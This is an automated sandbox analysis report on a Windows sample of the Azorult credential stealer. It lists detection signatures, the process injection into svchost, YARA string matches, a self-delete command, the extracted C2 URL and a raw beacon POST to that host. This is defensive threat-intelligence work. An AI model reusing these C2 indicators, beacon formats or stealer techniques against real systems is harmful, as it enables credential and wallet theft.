Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cJX8BV8LYG.exe

Overview

General Information

Sample name:cJX8BV8LYG.exe
renamed because original name is a hash value
Original sample name:528D3EF48415F22BD277A9759D83A859.exe
Analysis ID:1501450
MD5:528d3ef48415f22bd277a9759d83a859
SHA1:4ee7ed36eeaceca51e91952d25136f7260be6eab
SHA256:7c5bd51d549520223a57177f6dde2feea2a8e48077a36d73b1c96701360a68a6
Tags:AZORultexe
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cJX8BV8LYG.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\cJX8BV8LYG.exe" MD5: 528D3EF48415F22BD277A9759D83A859)
    • svchost.exe (PID: 4940 cmdline: "C:\Users\user\Desktop\cJX8BV8LYG.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • cmd.exe (PID: 6944 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5236 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://ln6b9.shop/LN341/index.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
      00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
        • 0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
        • 0xd778:$a2: %APPDATA%\.purple\accounts.xml
        • 0xdec0:$a3: %TEMP%\curbuf.dat
        • 0x1a1d4:$a4: PasswordsList.txt
        • 0x151d8:$a5: Software\Valve\Steam
        00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
        • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
        • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          1.2.svchost.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            1.2.svchost.exe.400000.0.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
            • 0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
            • 0xcb78:$a2: %APPDATA%\.purple\accounts.xml
            • 0xd2c0:$a3: %TEMP%\curbuf.dat
            • 0x195d4:$a4: PasswordsList.txt
            • 0x145d8:$a5: Software\Valve\Steam
            1.2.svchost.exe.400000.0.unpackAzorult_1Azorult Payloadkevoreilly
            • 0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
            • 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
            1.2.svchost.exe.400000.0.unpackAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
            • 0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            • 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            • 0x19760:$v2: http://ip-api.com/json
            • 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
            Click to see the 21 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ParentImage: C:\Users\user\Desktop\cJX8BV8LYG.exe, ParentProcessId: 5016, ParentProcessName: cJX8BV8LYG.exe, ProcessCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ProcessId: 4940, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ParentImage: C:\Users\user\Desktop\cJX8BV8LYG.exe, ParentProcessId: 5016, ParentProcessName: cJX8BV8LYG.exe, ProcessCommandLine: "C:\Users\user\Desktop\cJX8BV8LYG.exe", ProcessId: 4940, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-29T23:42:06.010055+0200
            SID:2029467
            Severity:1
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-29T23:42:06.010055+0200
            SID:2810276
            Severity:1
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-29T23:42:06.268614+0200
            SID:2029136
            Severity:1
            Source Port:80
            Destination Port:49730
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-29T23:42:14.381818+0200
            SID:2029467
            Severity:1
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://ln6b9.shop/LN341/index.phpAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://ln6b9.shop/LN341/index.php"}
            Multi AV Scanner detection for submitted file
            Source: cJX8BV8LYG.exeReversingLabs: Detection: 68%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: cJX8BV8LYG.exeJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004094C4 CryptUnprotectData,LocalFree,1_2_004094C4
            Source: cJX8BV8LYG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: wntdll.pdb source: cJX8BV8LYG.exe, 00000000.00000003.1704325941.0000000003960000.00000004.00001000.00020000.00000000.sdmp, cJX8BV8LYG.exe, 00000000.00000003.1705553215.0000000003B00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: wntdll.pdbUGP source: cJX8BV8LYG.exe, 00000000.00000003.1704325941.0000000003960000.00000004.00001000.00020000.00000000.sdmp, cJX8BV8LYG.exe, 00000000.00000003.1705553215.0000000003B00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_007EDBBE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F68EE FindFirstFileW,FindClose,0_2_007F68EE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_007F698F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED076
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED3A9
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F9642
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F979D
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_007F9B2B
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_007F5C97
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,1_2_004098A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D0A0 FindFirstFileW,1_2_0040D0A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,1_2_004087DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D06E FindFirstFileW,1_2_0040D06E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,1_2_0041303C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,1_2_0040989F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,1_2_004111C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,1_2_0041158C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,1_2_00411590
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,1_2_00412D9C

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49730 -> 172.67.128.117:80
            Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.4:49730 -> 172.67.128.117:80
            Source: Network trafficSuricata IDS: 2029136 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M1 : 172.67.128.117:80 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49731 -> 172.67.128.117:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.128.117 80Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://ln6b9.shop/LN341/index.php
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 65 8b 30 64 8b 30 6d eb 47 16 ed 26 66 97 26 67 ea 40 70 9d 30 70 9d 37 14 8b 30 61 e8 26 66 9e 26 66 97 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10e0d0mG&f&g@p0p70a&f&f
